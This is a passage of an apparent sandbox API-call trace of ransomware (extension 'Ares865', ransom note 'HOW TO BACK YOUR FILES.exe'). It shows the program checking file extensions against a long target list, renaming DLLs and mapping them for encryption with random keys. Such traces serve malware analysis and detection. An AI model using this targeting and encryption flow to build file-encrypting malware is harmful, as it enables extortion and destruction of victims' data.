3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0128.834] lstrlenW (lpString="eco") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0128.835] lstrlenW (lpString="ecx") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0128.835] lstrlenW (lpString="edb") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0128.835] lstrlenW (lpString="epim") returned 4 [0128.835] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0128.835] lstrlenW (lpString="fcd") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0128.835] lstrlenW (lpString="fdb") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0128.835] lstrlenW (lpString="fic") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0128.835] lstrlenW (lpString="flexolibrary") returned 12 [0128.835] lstrcmpiW (lpString1="signTime.dll", lpString2="flexolibrary") returned 1 [0128.835] lstrlenW (lpString="fm5") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0128.835] lstrlenW (lpString="fmp") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0128.835] lstrlenW (lpString="fmp12") returned 5 [0128.835] lstrcmpiW (lpString1="e.dll", lpString2="fmp12") returned -1 [0128.835] lstrlenW (lpString="fmpsl") returned 5 [0128.835] lstrcmpiW (lpString1="e.dll", lpString2="fmpsl") returned -1 [0128.835] lstrlenW (lpString="fol") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0128.835] lstrlenW (lpString="fp3") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0128.835] lstrlenW (lpString="fp4") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0128.835] lstrlenW (lpString="fp5") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0128.835] lstrlenW (lpString="fp7") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0128.835] lstrlenW (lpString="fpt") returned 3 [0128.835] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0128.836] lstrlenW (lpString="frm") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0128.836] lstrlenW (lpString="gdb") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0128.836] lstrlenW (lpString="gdb") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0128.836] lstrlenW (lpString="grdb") returned 4 [0128.836] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0128.836] lstrlenW (lpString="gwi") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0128.836] lstrlenW (lpString="hdb") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0128.836] lstrlenW (lpString="his") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0128.836] lstrlenW (lpString="ib") returned 2 [0128.836] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0128.836] lstrlenW (lpString="idb") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0128.836] lstrlenW (lpString="ihx") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0128.836] lstrlenW (lpString="itdb") returned 4 [0128.836] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0128.836] lstrlenW (lpString="itw") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0128.836] lstrlenW (lpString="jet") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0128.836] lstrlenW (lpString="jtx") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0128.836] lstrlenW (lpString="kdb") returned 3 [0128.836] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0128.836] lstrlenW (lpString="kexi") returned 4 [0128.836] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0128.836] lstrlenW (lpString="kexic") returned 5 [0128.836] lstrcmpiW (lpString1="e.dll", lpString2="kexic") returned -1 [0128.836] lstrlenW (lpString="kexis") returned 5 [0128.837] lstrcmpiW (lpString1="e.dll", lpString2="kexis") returned -1 [0128.837] lstrlenW (lpString="lgc") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0128.837] lstrlenW (lpString="lwx") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0128.837] lstrlenW (lpString="maf") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0128.837] lstrlenW (lpString="maq") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0128.837] lstrlenW (lpString="mar") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0128.837] lstrlenW (lpString="marshal") returned 7 [0128.837] lstrcmpiW (lpString1="ime.dll", lpString2="marshal") returned -1 [0128.837] lstrlenW (lpString="mas") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0128.837] lstrlenW (lpString="mav") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0128.837] lstrlenW (lpString="maw") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0128.837] lstrlenW (lpString="mdbhtml") returned 7 [0128.837] lstrcmpiW (lpString1="ime.dll", lpString2="mdbhtml") returned -1 [0128.837] lstrlenW (lpString="mdn") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0128.837] lstrlenW (lpString="mdt") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0128.837] lstrlenW (lpString="mfd") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0128.837] lstrlenW (lpString="mpd") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0128.837] lstrlenW (lpString="mrg") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0128.837] lstrlenW (lpString="mud") returned 3 [0128.837] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0128.837] lstrlenW (lpString="mwb") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0128.838] lstrlenW (lpString="myd") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0128.838] lstrlenW (lpString="ndf") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0128.838] lstrlenW (lpString="nnt") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0128.838] lstrlenW (lpString="nrmlib") returned 6 [0128.838] lstrcmpiW (lpString1="me.dll", lpString2="nrmlib") returned -1 [0128.838] lstrlenW (lpString="ns2") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0128.838] lstrlenW (lpString="ns3") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0128.838] lstrlenW (lpString="ns4") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0128.838] lstrlenW (lpString="nsf") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0128.838] lstrlenW (lpString="nv") returned 2 [0128.838] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0128.838] lstrlenW (lpString="nv2") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0128.838] lstrlenW (lpString="nwdb") returned 4 [0128.838] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0128.838] lstrlenW (lpString="nyf") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0128.838] lstrlenW (lpString="odb") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0128.838] lstrlenW (lpString="odb") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0128.838] lstrlenW (lpString="oqy") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0128.838] lstrlenW (lpString="ora") returned 3 [0128.838] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0128.839] lstrlenW (lpString="orx") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0128.839] lstrlenW (lpString="owc") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0128.839] lstrlenW (lpString="p96") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0128.839] lstrlenW (lpString="p97") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0128.839] lstrlenW (lpString="pan") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0128.839] lstrlenW (lpString="pdb") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0128.839] lstrlenW (lpString="pdm") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0128.839] lstrlenW (lpString="pnz") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0128.839] lstrlenW (lpString="qry") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0128.839] lstrlenW (lpString="qvd") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0128.839] lstrlenW (lpString="rbf") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0128.839] lstrlenW (lpString="rctd") returned 4 [0128.839] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0128.839] lstrlenW (lpString="rod") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0128.839] lstrlenW (lpString="rodx") returned 4 [0128.839] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0128.839] lstrlenW (lpString="rpd") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0128.839] lstrlenW (lpString="rsd") returned 3 [0128.839] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0128.839] lstrlenW (lpString="sas7bdat") returned 8 [0128.839] lstrcmpiW (lpString1="Time.dll", lpString2="sas7bdat") returned 1 [0128.840] lstrlenW (lpString="sbf") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0128.840] lstrlenW (lpString="scx") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0128.840] lstrlenW (lpString="sdb") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0128.840] lstrlenW (lpString="sdc") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0128.840] lstrlenW (lpString="sdf") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0128.840] lstrlenW (lpString="sis") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0128.840] lstrlenW (lpString="spq") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0128.840] lstrlenW (lpString="te") returned 2 [0128.840] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0128.840] lstrlenW (lpString="teacher") returned 7 [0128.840] lstrcmpiW (lpString1="ime.dll", lpString2="teacher") returned -1 [0128.840] lstrlenW (lpString="tmd") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0128.840] lstrlenW (lpString="tps") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0128.840] lstrlenW (lpString="trc") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0128.840] lstrlenW (lpString="trc") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0128.840] lstrlenW (lpString="trm") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0128.840] lstrlenW (lpString="udb") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0128.840] lstrlenW (lpString="udl") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0128.840] lstrlenW (lpString="usr") returned 3 [0128.840] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0128.840] lstrlenW (lpString="v12") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0128.841] lstrlenW (lpString="vis") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0128.841] lstrlenW (lpString="vpd") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0128.841] lstrlenW (lpString="vvv") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0128.841] lstrlenW (lpString="wdb") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0128.841] lstrlenW (lpString="wmdb") returned 4 [0128.841] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0128.841] lstrlenW (lpString="wrk") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0128.841] lstrlenW (lpString="xdb") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0128.841] lstrlenW (lpString="xld") returned 3 [0128.841] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0128.841] lstrlenW (lpString="xmlff") returned 5 [0128.841] lstrcmpiW (lpString1="e.dll", lpString2="xmlff") returned -1 [0128.841] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.Ares865") returned 142 [0128.841] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll.ares865"), dwFlags=0x1) returned 1 [0128.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71592) returned 1 [0128.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.845] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11ab0, lpName=0x0) returned 0x170 [0128.847] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11ab0) returned 0x190000 [0128.855] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0128.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0128.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.857] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.857] CloseHandle (hObject=0x170) returned 1 [0128.857] CloseHandle (hObject=0x118) returned 1 [0128.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.858] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ab3000, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x61771db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56ab3000, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x9758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.AddIn.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0128.858] lstrcmpiW (lpString1="System.AddIn.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.858] lstrcmpiW (lpString1="System.AddIn.dll", lpString2="aoldtz.exe") returned 1 [0128.858] lstrcpyW (in: lpString1=0x2cce49c, lpString2="System.AddIn.dll" | out: lpString1="System.AddIn.dll") returned="System.AddIn.dll" [0128.858] lstrlenW (lpString="System.AddIn.dll") returned 16 [0128.858] lstrlenW (lpString="Ares865") returned 7 [0128.858] lstrcmpiW (lpString1="dIn.dll", lpString2="Ares865") returned 1 [0128.859] lstrlenW (lpString=".dll") returned 4 [0128.859] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".dll") returned 1 [0128.859] lstrlenW (lpString=".lnk") returned 4 [0128.859] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".lnk") returned 1 [0128.859] lstrlenW (lpString=".ini") returned 4 [0128.859] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".ini") returned 1 [0128.859] lstrlenW (lpString=".sys") returned 4 [0128.859] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".sys") returned 1 [0128.859] lstrlenW (lpString="System.AddIn.dll") returned 16 [0128.859] lstrlenW (lpString="bak") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0128.859] lstrlenW (lpString="ba_") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0128.859] lstrlenW (lpString="dbb") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0128.859] lstrlenW (lpString="vmdk") returned 4 [0128.859] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0128.859] lstrlenW (lpString="rar") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0128.859] lstrlenW (lpString="zip") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0128.859] lstrlenW (lpString="tgz") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0128.859] lstrlenW (lpString="vbox") returned 4 [0128.859] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0128.859] lstrlenW (lpString="vdi") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0128.859] lstrlenW (lpString="vhd") returned 3 [0128.859] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0128.859] lstrlenW (lpString="vhdx") returned 4 [0128.859] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0128.859] lstrlenW (lpString="avhd") returned 4 [0128.859] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0128.860] lstrlenW (lpString="db") returned 2 [0128.860] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0128.860] lstrlenW (lpString="db2") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0128.860] lstrlenW (lpString="db3") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0128.860] lstrlenW (lpString="dbf") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0128.860] lstrlenW (lpString="mdf") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0128.860] lstrlenW (lpString="mdb") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0128.860] lstrlenW (lpString="sql") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0128.860] lstrlenW (lpString="sqlite") returned 6 [0128.860] lstrcmpiW (lpString1="In.dll", lpString2="sqlite") returned -1 [0128.860] lstrlenW (lpString="sqlite3") returned 7 [0128.860] lstrcmpiW (lpString1="dIn.dll", lpString2="sqlite3") returned -1 [0128.860] lstrlenW (lpString="sqlitedb") returned 8 [0128.860] lstrcmpiW (lpString1="ddIn.dll", lpString2="sqlitedb") returned -1 [0128.860] lstrlenW (lpString="xml") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0128.860] lstrlenW (lpString="$er") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0128.860] lstrlenW (lpString="4dd") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0128.860] lstrlenW (lpString="4dl") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0128.860] lstrlenW (lpString="^^^") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0128.860] lstrlenW (lpString="abs") returned 3 [0128.860] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0128.860] lstrlenW (lpString="abx") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0128.861] lstrlenW (lpString="accdb") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accdb") returned 1 [0128.861] lstrlenW (lpString="accdc") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accdc") returned 1 [0128.861] lstrlenW (lpString="accde") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accde") returned 1 [0128.861] lstrlenW (lpString="accdr") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accdr") returned 1 [0128.861] lstrlenW (lpString="accdt") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accdt") returned 1 [0128.861] lstrlenW (lpString="accdw") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accdw") returned 1 [0128.861] lstrlenW (lpString="accft") returned 5 [0128.861] lstrcmpiW (lpString1="n.dll", lpString2="accft") returned 1 [0128.861] lstrlenW (lpString="adb") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0128.861] lstrlenW (lpString="adb") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0128.861] lstrlenW (lpString="ade") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0128.861] lstrlenW (lpString="adf") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0128.861] lstrlenW (lpString="adn") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0128.861] lstrlenW (lpString="adp") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0128.861] lstrlenW (lpString="alf") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0128.861] lstrlenW (lpString="ask") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0128.861] lstrlenW (lpString="btr") returned 3 [0128.861] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0128.861] lstrlenW (lpString="cat") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0128.862] lstrlenW (lpString="cdb") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0128.862] lstrlenW (lpString="ckp") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0128.862] lstrlenW (lpString="cma") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0128.862] lstrlenW (lpString="cpd") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0128.862] lstrlenW (lpString="dacpac") returned 6 [0128.862] lstrcmpiW (lpString1="In.dll", lpString2="dacpac") returned 1 [0128.862] lstrlenW (lpString="dad") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0128.862] lstrlenW (lpString="dadiagrams") returned 10 [0128.862] lstrcmpiW (lpString1=".AddIn.dll", lpString2="dadiagrams") returned -1 [0128.862] lstrlenW (lpString="daschema") returned 8 [0128.862] lstrcmpiW (lpString1="ddIn.dll", lpString2="daschema") returned 1 [0128.862] lstrlenW (lpString="db-journal") returned 10 [0128.862] lstrcmpiW (lpString1=".AddIn.dll", lpString2="db-journal") returned -1 [0128.862] lstrlenW (lpString="db-shm") returned 6 [0128.862] lstrcmpiW (lpString1="In.dll", lpString2="db-shm") returned 1 [0128.862] lstrlenW (lpString="db-wal") returned 6 [0128.862] lstrcmpiW (lpString1="In.dll", lpString2="db-wal") returned 1 [0128.862] lstrlenW (lpString="dbc") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0128.862] lstrlenW (lpString="dbs") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0128.862] lstrlenW (lpString="dbt") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0128.862] lstrlenW (lpString="dbv") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0128.862] lstrlenW (lpString="dbx") returned 3 [0128.862] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0128.862] lstrlenW (lpString="dcb") returned 3 [0128.863] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0128.863] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll.Ares865") returned 102 [0128.863] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 